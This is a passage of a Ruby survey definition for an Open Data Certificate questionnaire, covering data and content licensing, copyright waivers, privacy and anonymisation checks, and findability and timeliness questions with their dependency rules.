:text_as_statement => 'Creative Commons Attribution'
a_cc_by_sa 'Creative Commons Attribution Share-Alike',
:text_as_statement => 'Creative Commons Attribution Share-Alike'
a_cc_zero 'Creative Commons CCZero',
:text_as_statement => 'Creative Commons CCZero'
a_odc_by 'Open Data Commons Attribution License',
:text_as_statement => 'Open Data Commons Attribution License'
a_odc_odbl 'Open Data Commons Open Database License (ODbL)',
:text_as_statement => 'Open Data Commons Open Database License (ODbL)'
a_odc_pddl 'Open Data Commons Public Domain Dedication and Licence (PDDL)',
:text_as_statement => 'Open Data Commons Public Domain Dedication and Licence (PDDL)'
a_na 'Not applicable',
:text_as_statement => ''
a_other 'Other...',
:text_as_statement => ''
q_dataNotApplicable 'Why doesn\'t a licence apply to this data?',
:discussion_topic => :uy_dataNotApplicable,
:display_on_certificate => true,
:text_as_statement => 'This data is not licensed because',
:pick => :one,
:required => :required
dependency :rule => 'A'
condition_A :q_dataLicence, '==', :a_na
a_norights 'there is no copyright in this data',
:text_as_statement => 'there is no copyright in it',
:help_text => 'Copyright only applies to data if you spent intellectual effort creating what\'s in it, for example, by writing text that\'s within the data, or deciding whether particular data is included. There\'s no copyright if the data only contains facts where no judgements were made about whether to include them or not.'
a_expired 'copyright has expired',
:text_as_statement => 'copyright has expired',
:help_text => 'Copyright lasts for a fixed amount of time, based on either the number of years after the death of its creator or its publication. You should check when the content was created or published because if that was a long time ago, copyright might have expired.'
a_waived 'copyright has been waived',
:text_as_statement => '',
:help_text => 'This means no one owns copyright and anyone can do whatever they want with this data.'
q_dataWaiver 'Which waiver do you use to waive copyright in the data?',
:discussion_topic => :uy_dataWaiver,
:display_on_certificate => true,
:text_as_statement => 'Rights in the data have been waived with',
:help_text => 'You need a statement to show people copyright has been waived, so they understand that they can do whatever they like with this data. Standard waivers already exist like PDDL and CCZero but you can write your own with legal advice.',
:pick => :one,
:required => :required,
:display_type => 'dropdown'
dependency :rule => 'A and B'
condition_A :q_dataLicence, '==', :a_na
condition_B :q_dataNotApplicable, '==', :a_waived
a_pddl 'Open Data Commons Public Domain Dedication and Licence (PDDL)',
:text_as_statement => 'Open Data Commons Public Domain Dedication and Licence (PDDL)'
a_cc0 'Creative Commons CCZero',
:text_as_statement => 'Creative Commons CCZero'
a_other 'Other...',
:text_as_statement => ''
q_dataOtherWaiver 'Where is the waiver for the copyright in the data?',
:discussion_topic => :uy_dataOtherWaiver,
:display_on_certificate => true,
:text_as_statement => 'Rights in the data have been waived with',
:help_text => 'Give a URL to your own publicly available waiver so people can check that it does waive copyright in the data.',
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_dataLicence, '==', :a_na
condition_B :q_dataNotApplicable, '==', :a_waived
condition_C :q_dataWaiver, '==', :a_other
a_1 'Waiver URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Waiver URL'
q_otherDataLicenceName 'What is the name of the licence?',
:discussion_topic => :uy_otherDataLicenceName,
:display_on_certificate => true,
:text_as_statement => 'This data is available under',
:help_text => 'If you use a different licence, we need the name so people can see it on your Open Data Certificate.',
:required => :required
dependency :rule => 'A'
condition_A :q_dataLicence, '==', :a_other
a_1 'Other Licence Name',
:string,
:required => :required,
:placeholder => 'Other Licence Name'
q_otherDataLicenceURL 'Where is the licence?',
:discussion_topic => :uy_otherDataLicenceURL,
:display_on_certificate => true,
:text_as_statement => 'This licence is at',
:help_text => 'Give a URL to the licence, so people can see it on your Open Data Certificate and check that it\'s publicly available.',
:required => :required
dependency :rule => 'A'
condition_A :q_dataLicence, '==', :a_other
a_1 'Other Licence URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Other Licence URL'
q_otherDataLicenceOpen 'Is the licence an open licence?',
:discussion_topic => :uy_otherDataLicenceOpen,
:help_text => 'If you aren\'t sure what an open licence is then read the <a href="http://opendefinition.org/">Open Knowledge Definition</a> definition. Next, choose your licence from the <a href="http://licenses.opendefinition.org/">Open Definition Advisory Board open licence list</a>. If a licence isn\'t in their list, it\'s either not open or hasn\'t been assessed yet.',
:help_text_more_url => 'http://opendefinition.org/',
:pick => :one,
:required => :required
dependency :rule => 'A'
condition_A :q_dataLicence, '==', :a_other
a_false 'no'
a_true 'yes',
:requirement => ['basic_7']
label_basic_7 'You must <strong>publish open data under an open licence</strong> so that people can use it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_7'
dependency :rule => 'A and B'
condition_A :q_dataLicence, '==', :a_other
condition_B :q_otherDataLicenceOpen, '==', :a_false
q_contentRights 'Is there any copyright in the content of this data?',
:discussion_topic => :uy_contentRights,
:display_on_certificate => true,
:text_as_statement => 'There are',
:pick => :one,
:required => :required
a_norights 'no, the data only contains facts and numbers',
:text_as_statement => 'no rights in the content of the data',
:help_text => 'There is no copyright in factual information. If the data does not contain any content that was created through intellectual effort, there are no rights in the content.'
a_samerights 'yes, and the rights are all held by the same person or organisation',
:text_as_statement => '',
:help_text => 'Choose this option if the content in the data was all created by or transferred to the same person or organisation.'
a_mixedrights 'yes, and the rights are held by different people or organisations',
:text_as_statement => '',
:help_text => 'In some data, the rights in different records are held by different people or organisations. Information about rights needs to be kept in the data too.'
q_explicitWaiver 'Is the content of the data marked as public domain?',
:discussion_topic => :uy_explicitWaiver,
:display_on_certificate => true,
:text_as_statement => 'The content has been',
:help_text => 'Content can be marked as public domain using the <a href="http://creativecommons.org/publicdomain/">Creative Commons Public Domain Mark</a>. This helps people know that it can be freely reused.',
:pick => :one
dependency :rule => 'A'
condition_A :q_contentRights, '==', :a_norights
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'marked as public domain',
:requirement => ['standard_3']
label_standard_3 'You should <strong>mark public domain content as public domain</strong> so that people know they can reuse it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_3'
dependency :rule => 'A and B'
condition_A :q_contentRights, '==', :a_norights
condition_B :q_explicitWaiver, '==', :a_false
q_contentLicence 'Under which licence can others reuse content?',
:discussion_topic => :uy_contentLicence,
:display_on_certificate => true,
:text_as_statement => 'The content is available under',
:help_text => 'Remember that whoever spends intellectual effort creating content automatically gets rights over it but creative content does not include facts. So people need a waiver or a licence which proves that they can use the content and explains how they can do that legally. We list the most common licenses here; if there is no copyright in the content, it\'s expired, or you\'ve waived them, choose \'Not applicable\'.',
:pick => :one,
:required => :required,
:display_type => 'dropdown'
dependency :rule => 'A'
condition_A :q_contentRights, '==', :a_samerights
a_cc_by 'Creative Commons Attribution',
:text_as_statement => 'Creative Commons Attribution'
a_cc_by_sa 'Creative Commons Attribution Share-Alike',
:text_as_statement => 'Creative Commons Attribution Share-Alike'
a_cc_zero 'Creative Commons CCZero',
:text_as_statement => 'Creative Commons CCZero'
a_na 'Not applicable',
:text_as_statement => ''
a_other 'Other...',
:text_as_statement => ''
q_contentNotApplicable 'Why doesn\'t a licence apply to the content of the data?',
:discussion_topic => :uy_contentNotApplicable,
:display_on_certificate => true,
:text_as_statement => 'The content in this data is not licensed because',
:pick => :one,
:required => :required
dependency :rule => 'A and B'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_na
a_norights 'there is no copyright in the content of this data',
:text_as_statement => 'there is no copyright',
:help_text => 'Copyright only applies to content if you spent intellectual effort creating it, for example, by writing text that\'s within the data. There\'s no copyright if the content only contains facts.'
a_expired 'copyright has expired',
:text_as_statement => 'copyright has expired',
:help_text => 'Copyright lasts for a fixed amount of time, based on either the number of years after the death of its creator or its publication. You should check when the content was created or published because if that was a long time ago, copyright might have expired.'
a_waived 'copyright has been waived',
:text_as_statement => '',
:help_text => 'This means no one owns copyright and anyone can do whatever they want with this data.'
q_contentWaiver 'Which waiver do you use to waive copyright?',
:discussion_topic => :uy_contentWaiver,
:display_on_certificate => true,
:text_as_statement => 'Copyright has been waived with',
:help_text => 'You need a statement to show people you\'ve done this, so they understand that they can do whatever they like with this data. Standard waivers already exist like CCZero but you can write your own with legal advice.',
:pick => :one,
:required => :required,
:display_type => 'dropdown'
dependency :rule => 'A and B and C'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_na
condition_C :q_contentNotApplicable, '==', :a_waived
a_cc0 'Creative Commons CCZero',
:text_as_statement => 'Creative Commons CCZero'
a_other 'Other...',
:text_as_statement => 'Other...'
q_contentOtherWaiver 'Where is the waiver for the copyright?',
:discussion_topic => :uy_contentOtherWaiver,
:display_on_certificate => true,
:text_as_statement => 'Copyright has been waived with',
:help_text => 'Give a URL to your own publicly available waiver so people can check that it does waive your copyright.',
:required => :required
dependency :rule => 'A and B and C and D'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_na
condition_C :q_contentNotApplicable, '==', :a_waived
condition_D :q_contentWaiver, '==', :a_other
a_1 'Waiver URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Waiver URL'
q_otherContentLicenceName 'What\'s the name of the licence?',
:discussion_topic => :uy_otherContentLicenceName,
:display_on_certificate => true,
:text_as_statement => 'The content is available under',
:help_text => 'If you use a different licence, we need its name so people can see it on your Open Data Certificate.',
:required => :required
dependency :rule => 'A and B'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_other
a_1 'Licence Name',
:string,
:required => :required,
:placeholder => 'Licence Name'
q_otherContentLicenceURL 'Where is the licence?',
:discussion_topic => :uy_otherContentLicenceURL,
:display_on_certificate => true,
:text_as_statement => 'The content licence is at',
:help_text => 'Give a URL to the licence, so people can see it on your Open Data Certificate and check that it\'s publicly available.',
:required => :required
dependency :rule => 'A and B'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_other
a_1 'Licence URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Licence URL'
q_otherContentLicenceOpen 'Is the licence an open licence?',
:discussion_topic => :uy_otherContentLicenceOpen,
:help_text => 'If you aren\'t sure what an open licence is then read the <a href="http://opendefinition.org/">Open Knowledge Definition</a> definition. Next, choose your licence from the <a href="http://licenses.opendefinition.org/">Open Definition Advisory Board open licence list</a>. If a licence isn\'t in their list, it\'s either not open or hasn\'t been assessed yet.',
:help_text_more_url => 'http://opendefinition.org/',
:pick => :one,
:required => :required
dependency :rule => 'A and B'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_other
a_false 'no'
a_true 'yes',
:requirement => ['basic_8']
label_basic_8 'You must <strong>publish open data under an open licence</strong> so that people can use it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_8'
dependency :rule => 'A and B and C'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_other
condition_C :q_otherContentLicenceOpen, '==', :a_false
q_contentRightsURL 'Where are the rights and licensing of the content explained?',
:discussion_topic => :uy_contentRightsURL,
:display_on_certificate => true,
:text_as_statement => 'The rights and licensing of the content are explained at',
:help_text => 'Give the URL for a page where you describe how someone can find out the rights and licensing of a piece of content from the data.',
:required => :required
dependency :rule => 'A'
condition_A :q_contentRights, '==', :a_mixedrights
a_1 'Content Rights Description URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Content Rights Description URL'
q_copyrightStatementMetadata 'Does your rights statement include machine-readable versions of',
:discussion_topic => :uy_copyrightStatementMetadata,
:display_on_certificate => true,
:text_as_statement => 'The rights statement includes data about',
:help_text => 'It\'s good practice to embed information about rights in machine-readable formats so people can automatically attribute this data back to you when they use it.',
:help_text_more_url => 'https://github.com/theodi/open-data-licensing/blob/master/guides/publisher-guide.md',
:pick => :any
dependency :rule => 'A'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
a_dataLicense 'data licence',
:text_as_statement => 'its data licence',
:requirement => ['standard_4']
a_contentLicense 'content licence',
:text_as_statement => 'its content licence',
:requirement => ['standard_5']
a_attribution 'attribution text',
:text_as_statement => 'what attribution text to use',
:requirement => ['standard_6']
a_attributionURL 'attribution URL',
:text_as_statement => 'what attribution link to give',
:requirement => ['standard_7']
a_copyrightNotice 'copyright notice or statement',
:text_as_statement => 'a copyright notice or statement',
:requirement => ['exemplar_1']
a_copyrightYear 'copyright year',
:text_as_statement => 'the copyright year',
:requirement => ['exemplar_2']
a_copyrightHolder 'copyright holder',
:text_as_statement => 'the copyright holder',
:requirement => ['exemplar_3']
label_standard_4 'You should provide <strong>machine-readable data in your rights statement about the licence</strong> for this data, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_4'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_dataLicense
label_standard_5 'You should provide <strong>machine-readable data in your rights statement about the licence for the content</strong> of this data, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_5'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_contentLicense
label_standard_6 'You should provide <strong>machine-readable data in your rights statement about the text to use when citing the data</strong>, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_6'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_attribution
label_standard_7 'You should provide <strong>machine-readable data in your rights statement about the URL to link to when citing this data</strong>, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_7'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_attributionURL
label_exemplar_1 'You should provide <strong>machine-readable data in your rights statement about the copyright statement or notice of this data</strong>, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_1'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_copyrightNotice
label_exemplar_2 'You should provide <strong>machine-readable data in your rights statement about the copyright year for the data</strong>, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_2'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_copyrightYear
label_exemplar_3 'You should provide <strong>machine-readable data in your rights statement about the copyright holder for the data</strong>, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_3'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_copyrightHolder
label_group_4 'Privacy',
:help_text => 'how you protect people\'s privacy',
:customer_renderer => '/partials/fieldset'
q_dataPersonal 'Can individuals be identified from this data?',
:discussion_topic => :uy_dataPersonal,
:display_on_certificate => true,
:text_as_statement => 'This data contains',
:pick => :one,
:required => :pilot
a_not_personal 'no, the data is not about people or their activities',
:text_as_statement => 'no data about individuals',
:help_text => 'Remember that individuals can still be identified even if data isn\'t directly about them. For example, road traffic flow data combined with an individual\'s commuting patterns could reveal information about that person.'
a_summarised 'no, the data has been anonymised by aggregating individuals into groups, so they can\'t be distinguished from other people in the group',
:text_as_statement => 'aggregated data',
:help_text => 'Statistical disclosure controls can help to make sure that individuals are not identifiable within aggregate data.'
a_individual 'yes, there is a risk that individuals be identified, for example by third parties with access to extra information',
:text_as_statement => 'information that could identify individuals',
:help_text => 'Some data is legitimately about individuals like civil service pay or public expenses for example.'
q_statisticalAnonAudited 'Has your anonymisation process been independently audited?',
:discussion_topic => :uy_statisticalAnonAudited,
:display_on_certificate => true,
:text_as_statement => 'The anonymisation process has been',
:pick => :one
dependency :rule => 'A'
condition_A :q_dataPersonal, '==', :a_summarised
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'independently audited',
:requirement => ['standard_8']
label_standard_8 'You should <strong>have your anonymisation process audited independently</strong> to ensure it reduces the risk of individuals being reidentified.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_8'
dependency :rule => 'A and B'
condition_A :q_dataPersonal, '==', :a_summarised
condition_B :q_statisticalAnonAudited, '==', :a_false
q_appliedAnon 'Have you attempted to reduce or remove the possibility of individuals being identified?',
:discussion_topic => :uy_appliedAnon,
:display_on_certificate => true,
:text_as_statement => 'This data about individuals has been',
:help_text => 'Anonymisation reduces the risk of individuals being identified from the data you publish. The best technique to use depends on the kind of data you have.',
:pick => :one,
:required => :pilot
dependency :rule => 'A'
condition_A :q_dataPersonal, '==', :a_individual
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'anonymised'
q_lawfulDisclosure 'Are you required or permitted by law to publish this data about individuals?',
:discussion_topic => :uy_lawfulDisclosure,
:display_on_certificate => true,
:text_as_statement => 'By law, this data about individuals',
:help_text => 'The law might require you to publish data about people, such as the names of company directors. Or you might have permission from the affected individuals to publish information about them.',
:pick => :one
dependency :rule => 'A and B'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_false
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'can be published',
:requirement => ['pilot_5']
label_pilot_5 'You should <strong>only publish personal data without anonymisation if you are required or permitted to do so by law</strong>.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_5'
dependency :rule => 'A and B and C'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_false
condition_C :q_lawfulDisclosure, '==', :a_false
q_lawfulDisclosureURL 'Where do you document your right to publish data about individuals?',
:discussion_topic => :uy_lawfulDisclosureURL,
:display_on_certificate => true,
:text_as_statement => 'The right to publish this data about individuals is documented at'
dependency :rule => 'A and B and C'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_false
condition_C :q_lawfulDisclosure, '==', :a_true
a_1 'Disclosure Rationale URL',
:string,
:input_type => :url,
:placeholder => 'Disclosure Rationale URL',
:requirement => ['standard_9']
label_standard_9 'You should <strong>document your right to publish data about individuals</strong> for people who use your data and for those affected by disclosure.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_9'
dependency :rule => 'A and B and C and D'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_false
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_lawfulDisclosureURL, '==', {:string_value => '', :answer_reference => '1'}
q_riskAssessmentExists 'Have you assessed the risks of disclosing personal data?',
:discussion_topic => :uy_riskAssessmentExists,
:display_on_certificate => true,
:text_as_statement => 'The curator has',
:help_text => 'A risk assessment measures risks to the privacy of individuals in your data as well as the use and disclosure of that information.',
:pick => :one
dependency :rule => 'A and (B or C)'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
a_false 'no',
:text_as_statement => 'not carried out a privacy risk assessment'
a_true 'yes',
:text_as_statement => 'carried out a privacy risk assessment',
:requirement => ['pilot_6']
label_pilot_6 'You should <strong>assess the risks of disclosing personal data</strong> if you publish data about individuals.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_6'
dependency :rule => 'A and (B or C) and D'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_false
q_riskAssessmentUrl 'Where is your risk assessment published?',
:discussion_topic => :uy_riskAssessmentUrl,
:display_on_certificate => true,
:text_as_statement => 'The risk assessment is published at',
:help_text => 'Give a URL to where people can check how you have assessed the privacy risks to individuals. This may be redacted or summarised if it contains sensitive information.'
dependency :rule => 'A and (B or C) and D'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
a_1 'Risk Assessment URL',
:string,
:input_type => :url,
:placeholder => 'Risk Assessment URL',
:requirement => ['standard_10']
label_standard_10 'You should <strong>publish your privacy risk assessment</strong> so people can understand how you have assessed the risks of disclosing data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_10'
dependency :rule => 'A and (B or C) and D and E'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
condition_E :q_riskAssessmentUrl, '==', {:string_value => '', :answer_reference => '1'}
q_riskAssessmentAudited 'Has your risk assessment been independently audited?',
:discussion_topic => :uy_riskAssessmentAudited,
:display_on_certificate => true,
:text_as_statement => 'The risk assessment has been',
:help_text => 'It\'s good practice to check your risk assessment was done correctly. Independent audits by specialists or third-parties tend to be more rigorous and impartial.',
:pick => :one
dependency :rule => 'A and (B or C) and D and E'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
condition_E :q_riskAssessmentUrl, '!=', {:string_value => '', :answer_reference => '1'}
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'independently audited',
:requirement => ['standard_11']
label_standard_11 'You should <strong>have your risk assessment audited independently</strong> to ensure it has been carried out correctly.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_11'
dependency :rule => 'A and (B or C) and D and E and F'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
condition_E :q_riskAssessmentUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_F :q_riskAssessmentAudited, '==', :a_false
q_anonymisationAudited 'Has your anonymisation approach been independently audited?',
:discussion_topic => :uy_anonymisationAudited,
:display_on_certificate => true,
:text_as_statement => 'The anonymisation of the data has been',
:help_text => 'It is good practice to make sure your process to remove personal identifiable data works properly. Independent audits by specialists or third-parties tend to be more rigorous and impartial.',
:pick => :one
dependency :rule => 'A and (B or C) and D'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'independently audited',
:requirement => ['standard_12']
label_standard_12 'You should <strong>have your anonymisation process audited independently</strong> by an expert to ensure it is appropriate for your data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_12'
dependency :rule => 'A and (B or C) and D and E'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
condition_E :q_anonymisationAudited, '==', :a_false
end
section_practical 'Practical Information',
:description => 'Findability, accuracy, quality and guarantees' do
label_group_6 'Findability',
:help_text => 'how you help people find your data',
:customer_renderer => '/partials/fieldset'
q_onWebsite 'Is there a link to your data from your main website?',
:discussion_topic => :onWebsite,
:help_text => 'Data can be found more easily if it is linked to from your main website.',
:pick => :one
a_false 'no'
a_true 'yes',
:requirement => ['standard_13']
label_standard_13 'You should <strong>ensure that people can find the data from your main website</strong> so that people can find it more easily.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_13'
dependency :rule => 'A'
condition_A :q_onWebsite, '==', :a_false
repeater 'Web Page' do
dependency :rule => 'A'
condition_A :q_onWebsite, '==', :a_true
q_webpage 'Which page on your website links to the data?',
:discussion_topic => :webpage,
:display_on_certificate => true,
:text_as_statement => 'The website links to the data from',
:help_text => 'Give a URL on your main website that includes a link to this data.',
:required => :required
dependency :rule => 'A'
condition_A :q_onWebsite, '==', :a_true
a_1 'Web page URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Web page URL'
end
q_listed 'Is your data listed within a collection?',
:discussion_topic => :listed,
:help_text => 'Data is easier for people to find when it\'s in relevant data catalogs like academic, public sector or health for example, or when it turns up in relevant search results.',
:pick => :one
a_false 'no'
a_true 'yes',
:requirement => ['standard_14']
label_standard_14 'You should <strong>ensure that people can find your data when they search for it</strong> in locations that list data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_14'
dependency :rule => 'A'
condition_A :q_listed, '==', :a_false
repeater 'Listing' do
dependency :rule => 'A'
condition_A :q_listed, '==', :a_true
q_listing 'Where is it listed?',
:discussion_topic => :listing,
:display_on_certificate => true,
:text_as_statement => 'The data appears in this collection',
:help_text => 'Give a URL where this data is listed within a relevant collection. For example, data.gov.uk (if it\'s UK public sector data), hub.data.ac.uk (if it\'s UK academia data) or a URL for search engine results.',
:required => :required
dependency :rule => 'A'
condition_A :q_listed, '==', :a_true
a_1 'Listing URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Listing URL'
end
q_referenced 'Is this data referenced from your own publications?',
:discussion_topic => :referenced,
:help_text => 'When you reference your data within your own publications, such as reports, presentations or blog posts, you give it more context and help people find and understand it better.',
:pick => :one
a_false 'no'
a_true 'yes',
:requirement => ['standard_15']
label_standard_15 'You should <strong>reference data from your own publications</strong> so that people are aware of its availability and context.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_15'
dependency :rule => 'A'
condition_A :q_referenced, '==', :a_false
repeater 'Reference' do
dependency :rule => 'A'
condition_A :q_referenced, '==', :a_true
q_reference 'Where is your data referenced?',
:discussion_topic => :reference,
:display_on_certificate => true,
:text_as_statement => 'This data is referenced from',
:help_text => 'Give a URL to a document that cites or references this data.',
:required => :required
dependency :rule => 'A'
condition_A :q_referenced, '==', :a_true
a_1 'Reference URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Reference URL'
end
label_group_7 'Accuracy',
:help_text => 'how you keep your data up-to-date',
:customer_renderer => '/partials/fieldset'
q_serviceType 'Does the data behind your API change?',
:discussion_topic => :serviceType,
:display_on_certificate => true,
:text_as_statement => 'The data behind the API',
:pick => :one,
:required => :pilot
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_service
a_static 'no, the API gives access to unchanging data',
:text_as_statement => 'will not change',
:help_text => 'Some APIs just make accessing an unchanging dataset easier, particularly when there\'s lots of it.'
a_changing 'yes, the API gives access to changing data',
:text_as_statement => 'will change',
:help_text => 'Some APIs give instant access to more up-to-date and ever-changing data'
q_timeSensitive 'Will your data go out of date?',
:discussion_topic => :timeSensitive,
:display_on_certificate => true,
:text_as_statement => 'The accuracy or relevance of this data will',
:pick => :one
dependency :rule => '(A or B or (C and D))'
condition_A :q_releaseType, '==', :a_oneoff
condition_B :q_releaseType, '==', :a_collection
condition_C :q_releaseType, '==', :a_service
condition_D :q_serviceType, '==', :a_static
a_true 'yes, this data will go out of date',
:text_as_statement => 'go out of date',
:help_text => 'For example, a dataset of bus stop locations will go out of date over time as some are moved or new ones created.'
a_timestamped 'yes, this data will go out of date over time but it’s time stamped',
:text_as_statement => 'go out of date but it is timestamped',
:help_text => 'For example, population statistics usually include a fixed timestamp to indicate when the statistics were relevant.',
:requirement => ['pilot_7']
a_false 'no, this data does not contain any time-sensitive information',
:text_as_statement => 'not go out of date',
:help_text => 'For example, the results of an experiment will not go out of date because the data accurately reports observed outcomes.',
:requirement => ['standard_16']
label_pilot_7 'You should <strong>put timestamps in your data when you release it</strong> so people know the period it relates to and when it will expire.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_7'
dependency :rule => '(A or B or (C and D)) and (E and F)'
condition_A :q_releaseType, '==', :a_oneoff
condition_B :q_releaseType, '==', :a_collection
condition_C :q_releaseType, '==', :a_service
condition_D :q_serviceType, '==', :a_static
condition_E :q_timeSensitive, '!=', :a_timestamped
condition_F :q_timeSensitive, '!=', :a_false
label_standard_16 'You should <strong>publish updates to time-sensitive data</strong> so that it does not go stale.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_16'
dependency :rule => '(A or B or (C and D)) and (E)'
condition_A :q_releaseType, '==', :a_oneoff
condition_B :q_releaseType, '==', :a_collection
condition_C :q_releaseType, '==', :a_service
condition_D :q_serviceType, '==', :a_static
condition_E :q_timeSensitive, '!=', :a_false
q_frequentChanges 'Does this data change at least daily?',
:discussion_topic => :frequentChanges,
:display_on_certificate => true,
:text_as_statement => 'This data changes',
:help_text => 'Tell people if the underlying data changes on most days. When data changes frequently it also goes out of date quickly, so people need to know if you also update it frequently and quickly too.',
:pick => :one,
:required => :pilot
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_series
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'at least daily'
q_seriesType 'What type of dataset series is this?',
:discussion_topic => :seriesType,
:display_on_certificate => true,
:text_as_statement => 'This data is a series of',
:pick => :one,
:required => :exemplar
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
a_dumps 'regular copies of a complete database',
:text_as_statement => 'copies of a database',
:help_text => 'Choose if you publish new and updated copies of your full database regularly. When you create database dumps, it\'s useful for people to have access to a feed of the changes so they can keep their copies up to date.'
a_aggregate 'regular aggregates of changing data',
:text_as_statement => 'aggregates of changing data',
:help_text => 'Choose if you create new datasets regularly. You might do this if the underlying data can\'t be released as open data or if you only publish data that\'s new since the last publication.'
q_changeFeed 'Is a feed of changes available?',
:discussion_topic => :changeFeed,
:display_on_certificate => true,
:text_as_statement => 'A feed of changes to this data',
:help_text => 'Tell people if you provide a stream of changes that affect this data, like new entries or amendments to existing entries. Feeds might be in RSS, Atom or custom formats.',
:pick => :one
dependency :rule => 'A and B and C'
